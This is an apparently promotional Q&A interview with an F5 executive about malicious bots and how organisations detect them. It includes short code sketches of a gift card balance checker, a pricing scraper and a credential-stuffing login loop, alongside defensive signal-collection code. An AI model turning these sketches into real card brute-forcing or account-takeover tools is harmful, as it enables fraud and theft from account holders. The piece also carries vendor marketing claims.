From propagating lies and manipulating social media users to disrupting global businesses, bots are an increasingly hot topic.
In part two of our Q&A with Dan Woods, Global Head of Intelligence at F5, we explore what bots do, the risks to be aware of, and how organizations can adapt to evolving threats. (Link to part one)
What are bots and why are they potentially dangerous?
Bots are snippets of code that automate tasks. Checking the balance on gift cards is one such example.
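To make that concrete, a balance-checking bot can be only a few lines long. The sketch below is a hypothetical illustration; the endpoint, field names, and response shape are assumptions, not any retailer's real API.

```typescript
// Hypothetical sketch of a gift card balance checker. The URL, request
// fields, and response shape are assumptions for illustration only.
async function checkBalance(cardNumber: string, pin: string): Promise<number | null> {
  const resp = await fetch("https://retailer.example.com/giftcard/balance", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ cardNumber, pin }),
  });
  if (!resp.ok) return null; // invalid card/PIN pair, rate limit, etc.
  const data = await resp.json();
  return data.balance; // remaining value on the card
}
```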
Why would anyone do this? Well, all that a bad actor needs to steal the amount stored on a gift card is the 16-digit card number and the PIN. They could use a modified version of the above bot to check the balance of millions, even billions, of card number-PIN pairs. When they find a card number-PIN pair with a balance, they can sell that to a third party. The genuine owner of the gift card won’t even realize the balance was stolen until they try to use it.
Bots are also being used to scrape insurance companies' websites. If you want a life insurance quote, you need to navigate a process that asks your age, where you live, what you do for a living, etc. Competitors and third parties can use a bot to navigate the same workflow, each time providing different answers. This enables them to reverse engineer the insurance company’s pricing algorithm.
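As an illustration, the scraping loop can be as simple as the sketch below, which sweeps a handful of inputs through a hypothetical quote endpoint (the URL and field names are assumptions) and tabulates the resulting premiums.

```typescript
// Hypothetical sketch: sweep the quote form's inputs to map out pricing.
interface QuoteRequest { age: number; zip: string; occupation: string; }

async function getQuote(q: QuoteRequest): Promise<number> {
  const resp = await fetch("https://insurer.example.com/api/quote", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(q),
  });
  const data = await resp.json();
  return data.monthlyPremium; // assumed response field
}

async function sweepPricing(): Promise<void> {
  const table: Array<QuoteRequest & { premium: number }> = [];
  for (const age of [25, 35, 45, 55, 65]) {
    for (const zip of ["10001", "60601", "94105"]) {
      const q: QuoteRequest = { age, zip, occupation: "teacher" };
      table.push({ ...q, premium: await getQuote(q) });
    }
  }
  console.table(table); // approximates the insurer's rate card for this occupation
}
```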
One of the biggest issues is malicious bots being used to try spilled usernames and passwords (from the dark web, or from a breach at some enterprise) against the login applications of other enterprises. Because consumers habitually reuse usernames and passwords, these attacks typically take over between 0.1% and 3.0% of the accounts attempted. So, when a bad actor tries hundreds of millions of username/password pairs, they end up compromising millions, even tens of millions, of accounts.
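The core automation is trivial, which is part of the problem. The sketch below shows the general idea, with an assumed login endpoint and success test; real attacks also rotate IP addresses and spoof client signals to evade detection.

```typescript
// Hypothetical sketch of credential stuffing. The endpoint, fields, and
// success test are assumptions for illustration only.
interface Credential { username: string; password: string; }

async function tryLogin(loginUrl: string, c: Credential): Promise<boolean> {
  const resp = await fetch(loginUrl, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(c),
  });
  return resp.ok; // treat a 2xx response as a successful takeover
}

async function stuff(loginUrl: string, spill: Credential[]): Promise<Credential[]> {
  const compromised: Credential[] = [];
  for (const c of spill) {
    if (await tryLogin(loginUrl, c)) compromised.push(c);
  }
  return compromised; // at 0.1-3.0% success, a large spill yields many accounts
}
```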
Other disruptive examples include a bot buying up limited-time-offer sneakers or concert tickets within 30 seconds of their going on sale, then reselling them at inflated prices on the secondary market. Or, if a company offers something of value for opening an online account, such as a free cup of coffee, a bot could create thousands of accounts to claim thousands of free cups of coffee. Or a criminal organization might need a large number of online accounts to engage in money laundering.
Are all bots bad?
Not all bots are bad. For instance, Googlebot crawls and indexes billions of web pages to make search possible. Kayak and other online travel agencies scrape airline and hotel fares from many travel companies to bring their customers the best deals.
What about the impact of bots on social media companies?
A few years ago, a social media company engaged F5 to better understand the bots that were active against their web and mobile applications. When we went in-line and deployed our client-side signals (the signals that help us identify bots), we determined that more than 90% of all their logins were bot-related. Based on the high login success rate and discussions with the customer, we concluded the accounts were being used for sweetheart scams. Unfortunately, some social media companies are not interested in knowing the truth about their bot traffic, because the truth would hurt their daily active user (DAU) numbers and, in turn, their stock price or valuation.
How can bots influence public opinion and manipulate social media users?
Imagine the influence a bad actor could wield with programmatic control over millions of Twitter, TikTok, Facebook, or Instagram accounts. For starters, they could amplify a significant volume of news and content to influence public opinion.
Over the last six to seven years, whenever I saw an incentive, a means, and no meaningful countermeasure before going in-line, I always observed the automation I expected after going in-line. There is no doubt in my mind that political and state actors are using social media platforms to influence public opinion and even elections.
Everyone is impressionable. Some more than others. If a comedian tells a joke and you don’t laugh, but everyone else laughs, you might start to believe the joke was actually funny. This is why sitcoms used laugh tracks. The more impressionable someone is, the more likely they are to change their opinion based on pressure from peers—even if those peers are actually bots.
Why do companies underestimate the bot issue?
Many bots increase losses due to fraud. But the damage doesn't end there: depending on the volume of bots, they can also drive up costs associated with CDNs or fraud tools that charge per transaction. They can add latency and ruin the user experience for legitimate customers. And the metrics they skew can distort corporate spending and decision making.
Most companies want to know the truth. Those that engage F5 learn it, but those that try to detect bots as a DIY project almost always underestimate the size of the problem, for a few reasons.
First, bots now use hundreds of thousands, or even millions, of IP addresses. Security teams can typically identify the few hundred or few thousand noisiest IPs, but they miss the long tail of IPs a bot uses only a few times. Second, bot attacks often ramp up gradually over time, which makes them hard to distinguish from organic growth. After working with F5, organizations often find the results shocking, even unbelievable, but they quickly become believers when they see the data.
What should organizations do to reduce the problem of bots on their sites?
Two things: they must collect client-side signals (from the user, the user agent, device, and network) and they must have two stages of defense.
Examples of client-side signals include timing of keystrokes and mouse clicks/movements, plugins, fonts, screen utilization, number of cores, how the user agent performs floating point math or renders emojis, and dozens more.
You don’t need hundreds or thousands of signals; a few dozen high-quality signals that are very difficult to spoof will do. These signals are typically collected using JavaScript in web and mobile browsers, and via an SDK embedded in the native mobile app, because attackers who are mitigated on the web will transition to attacking the mobile API. Both the JavaScript and the SDK must be well-hardened to make reverse engineering extremely difficult.
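To give a sense of what collection looks like, here is a minimal browser-side sketch covering a few of the signals mentioned above. It is illustrative only; it is not F5's collector, and production collectors gather far more signals and are hardened against reverse engineering.

```typescript
// Minimal sketch of client-side signal collection in a browser.
// Illustrative assumptions only; real collectors are far more extensive.
interface ClientSignals {
  cores: number;           // reported CPU core count
  screen: string;          // screen dimensions
  plugins: string[];       // installed plugin names
  floatQuirk: number;      // engine-specific floating point result
  keystrokeGaps: number[]; // inter-keystroke timings in milliseconds
}

const keystrokeGaps: number[] = [];
let lastKeyTime = 0;
document.addEventListener("keydown", () => {
  const now = performance.now();
  if (lastKeyTime > 0) keystrokeGaps.push(now - lastKeyTime);
  lastKeyTime = now;
});

function collectSignals(): ClientSignals {
  return {
    cores: navigator.hardwareConcurrency,
    screen: `${window.screen.width}x${window.screen.height}`,
    plugins: Array.from(navigator.plugins).map((p) => p.name),
    floatQuirk: Math.tan(-1e300),            // differs subtly across engines
    keystrokeGaps: keystrokeGaps.slice(-20), // last 20 gaps; bots often have none
  };
}
```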
Now let’s look at the two stages of defense.
The first stage is near real-time (sub-10 ms) and leverages the signals associated with a single transaction. If the signals indicate it's an unwanted bot, take mitigating action. If the signals indicate the transaction is from a human, pass it to origin for normal processing. While this first stage will identify nearly all the bots, it cannot keep up with retools (when attackers realize their attack is being mitigated and improve their bots to overcome the countermeasure).
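In code, the first stage amounts to a fast per-transaction classification. The sketch below uses deliberately naive heuristics as stand-ins for real signal analysis; the signal shape and checks are assumptions.

```typescript
// Sketch of a first-stage, per-transaction decision. The signal shape and
// heuristics are illustrative assumptions, not a real detection model.
interface TxnSignals { keystrokeGaps: number[]; plugins: string[]; cores: number; }
type Verdict = "human" | "bot";

function firstStage(s: TxnSignals): Verdict {
  // Scripted clients often show no human keystroke cadence, an empty
  // plugin list, or implausible hardware values.
  const looksScripted =
    s.keystrokeGaps.length === 0 || s.plugins.length === 0 || s.cores === 0;
  return looksScripted ? "bot" : "human";
}
// "bot"   -> take mitigating action
// "human" -> pass the transaction to origin for normal processing
```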
Retools are why organizations need a second stage of defense. While the first stage is near real-time, the second is retrospective: AI/ML models operate on aggregated transactions (all the transactions that arrived in the last 30 seconds, minute, hour, day, or few days). Even so, organizations cannot rely exclusively on AI/ML to find retools. They must have humans reviewing the alerts fired by the AI/ML systems, both to weed out false positives and to make sure the models are learning correctly. And when unwanted bot traffic is discovered in the second stage, organizations must be able to update the real-time defenses to mitigate it without impacting traffic from legitimate customers.
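As a rough illustration of retrospective analysis, the sketch below flags IPs whose first-stage "human" traffic suddenly surges past its historical baseline, one kind of anomaly a retool can produce. The heuristic and thresholds are arbitrary assumptions, not F5's actual models.

```typescript
// Sketch of a retrospective, second-stage check over an aggregation window.
// The surge heuristic and thresholds are illustrative assumptions.
interface TxnRecord { ip: string; verdict: "human" | "bot"; timestamp: number; }

function flagSuspectIps(
  recent: TxnRecord[],           // e.g., the last hour of transactions
  baseline: Map<string, number>, // typical per-IP "human" counts
): string[] {
  const perIp = new Map<string, number>();
  for (const t of recent) {
    if (t.verdict === "human") perIp.set(t.ip, (perIp.get(t.ip) ?? 0) + 1);
  }
  const suspects: string[] = [];
  for (const [ip, count] of perIp) {
    const usual = baseline.get(ip) ?? 0;
    if (count > 10 * usual + 50) suspects.push(ip); // sudden surge past baseline
  }
  return suspects; // alerts go to human review, then feed back into stage one
}
```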
F5 provides both stages of defense, the AI/ML, and the humans, as a managed service. Battling bots should never be a DIY project.
Is the bot threat going to get worse?
It’s impossible to quantify precisely, but the bot problem has certainly grown over the last six to seven years. During that time, I’ve seen malicious and nuisance bots launched against companies in virtually every vertical. Just when I think I’ve seen every use case, a new one emerges. Taking your eye off the ball is never an option!